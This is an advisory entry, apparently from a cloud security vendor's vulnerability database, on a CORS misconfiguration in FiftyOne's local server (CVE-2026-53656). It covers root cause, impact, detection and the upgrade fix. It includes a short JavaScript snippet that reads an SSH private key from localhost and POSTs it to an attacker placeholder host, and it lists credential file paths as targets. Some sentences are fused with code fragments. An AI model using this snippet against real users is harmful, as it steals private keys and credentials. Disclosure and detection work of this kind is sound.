
Cloud Vulnerability DB
Eine von der Community geführte Datenbank für Schwachstellen
CVE-2026-53656 is a permissive CORS misconfiguration vulnerability in the FiftyOne App/API server that enables drive-by data exfiltration from a user's local machine. Both fiftyone/server/app.py and the /media route (fiftyone/server/routes/media.py) unconditionally set Access-Control-Allow-Origin: *, allowing any website to make cross-origin requests to the locally running, unauthenticated FiftyOne server and read the responses. All versions of the fiftyone pip package prior to 1.17.0 are affected. The advisory was published on June 4, 2026, and added to the GitHub Advisory Database on July 15, 2026. It carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory, Voxel51 Advisory).
The root cause is an origin validation error (CWE-346) combined with a permissive cross-domain policy with untrusted domains (CWE-942): both app.py and media.py hard-coded Access-Control-Allow-Origin: * in their response headers, bypassing the browser's same-origin policy for all cross-origin requestors. The unauthenticated /media endpoint accepts a filepath query parameter and serves arbitrary files from the local filesystem, so a malicious page can issue a fetch to http://localhost:5151/media?filepath=/etc/passwd (or any other path) and read the full response. No authentication, credentials, or prior access to the victim's machine are required — the only precondition is that the victim has a FiftyOne server running locally (default port 5151) and visits an attacker-controlled web page. Browsers implementing Private Network Access (e.g., Chromium 142+) partially mitigate the attack, but Safari and Firefox do not yet enforce these protections (GitHub Advisory, Voxel51 Advisory).
Successful exploitation results in high confidentiality impact with no integrity or availability impact. An attacker who lures a victim to a malicious web page can silently exfiltrate arbitrary local files readable by the FiftyOne server process — including SSH private keys, cloud provider credentials, .env files, and dataset media — to an attacker-controlled endpoint. Because the /media endpoint accepts arbitrary filesystem paths, the scope of data exposure extends beyond FiftyOne datasets to any file accessible to the server process user account. Media stored in cloud buckets served via signed URLs on a separate origin is not affected (GitHub Advisory).
localhost:5151 by default.fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa')
.then(r => r.text())
.then(data => fetch('https://attacker.example.com/exfil', {method:'POST', body: data}));Access-Control-Allow-Origin: *, the browser permits the cross-origin read./etc/passwd, ~/.aws/credentials, ~/.env, SSH keys, etc.) to maximize data collection (GitHub Advisory, Voxel51 Advisory)./media requests; unexpected cross-origin requests to localhost:5151 visible in browser developer tools or local proxy logs.GET /media?filepath= requests with sensitive filesystem paths (e.g., /etc/passwd, /.ssh/id_rsa, /.aws/credentials, /.env) from 127.0.0.1 or ::1 with a browser User-Agent string (indicating browser-originated requests rather than direct API calls).Upgrade to FiftyOne 1.17.0 or later, which removes the hard-coded Access-Control-Allow-Origin: * header and defaults to same-origin-only responses (FiftyOne Release). If cross-origin access is legitimately required, configure specific trusted origins via the new FIFTYONE_ALLOWED_ORIGINS environment variable (e.g., export FIFTYONE_ALLOWED_ORIGINS='https://trusted.example.com'); setting it to * restores the vulnerable behavior and emits a warning. For users unable to upgrade immediately: do not run the FiftyOne App server while browsing untrusted websites, keep the server bound to localhost (the default), and prefer browsers with Private Network Access enforcement such as Chromium 142+ (Voxel51 Advisory).
The advisory was published by Voxel51 maintainer benjaminpkane on June 4, 2026, with credited finders vittorio-prodomo and AAtomical, and remediation contributors mo-getter, kevin-dimichel, and AdonaiVera. No significant external media coverage or notable researcher commentary beyond the official advisory has been identified at this time (GitHub Advisory).
Quelle: Dieser Bericht wurde mithilfe von KI erstellt
Kostenlose Schwachstellenbewertung
Bewerten Sie Ihre Cloud-Sicherheitspraktiken in 9 Sicherheitsbereichen, um Ihr Risikoniveau zu bewerten und Lücken in Ihren Abwehrmaßnahmen zu identifizieren.
Eine personalisierte Demo anfordern
"Die beste Benutzererfahrung, die ich je gesehen habe, bietet vollständige Transparenz für Cloud-Workloads."
"„Wiz bietet eine zentrale Oberfläche, um zu sehen, was in unseren Cloud-Umgebungen vor sich geht.“ "
"„Wir wissen, dass, wenn Wiz etwas als kritisch identifiziert, es auch wirklich kritisch ist.“"